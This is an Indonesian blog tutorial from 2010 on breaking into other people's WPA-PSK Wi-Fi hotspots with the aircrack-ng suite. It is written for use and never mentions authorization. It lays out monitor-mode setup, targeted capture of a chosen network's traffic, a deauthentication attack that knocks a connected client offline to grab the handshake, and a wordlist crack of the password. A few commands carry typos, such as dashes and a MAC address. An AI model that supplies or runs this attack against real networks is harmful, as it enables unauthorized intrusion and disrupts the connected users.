Anda di halaman 1dari 2

Rabu, 21 April 2010

Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK

Dengan Linux Ubuntu


Kali ini, aku akan mencoba sedkit memberi penejelasan bagaimana sih cara membobol password
hotspot yang bertipe wpa-psk dengan mudah.
Cara ini bisa menggunakan linux backtrack 4 dinal release atau linux apapun tertama asal sudah
terinstall aplikasi aircrack-ng. Nda berlama-lama mari simak artikel berikut.
Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi
aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu
sudo apt-get install aircrack-ng
Kedua,  masuk ke dekstop dengan perintah ~# startx (untuk yang make backtrack)
Ketiga,  buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada
sudo su
ifconfig -a
Keempt, ketikkan perintah di bawah untuk mengaktifkan interface wlan0
ifconfig wlan0 up
Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode
monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0
Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
cat : mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi
perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
ket: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan
hasil dari monitoring di tulis pada file yang bernama ‘coba’
Selanjutnya, gunakan serangan dengan cara disconnect salah satu client  untuk mendapatkan
paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
ket: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3
untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan
menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
ket : listpass.txt adalah file password yang saya buat sendiri dan terletak pada
/pentest/passwords/wordlists/listpass.txt
Oiya, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password
dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di
list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak
mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses
cracking akan gagal. Dan akhirnya, yang sedikit dari aku ini semoga membantu buat
pengetahuan yang belum tau aja. Selamat mencoba

Anda mungkin juga menyukai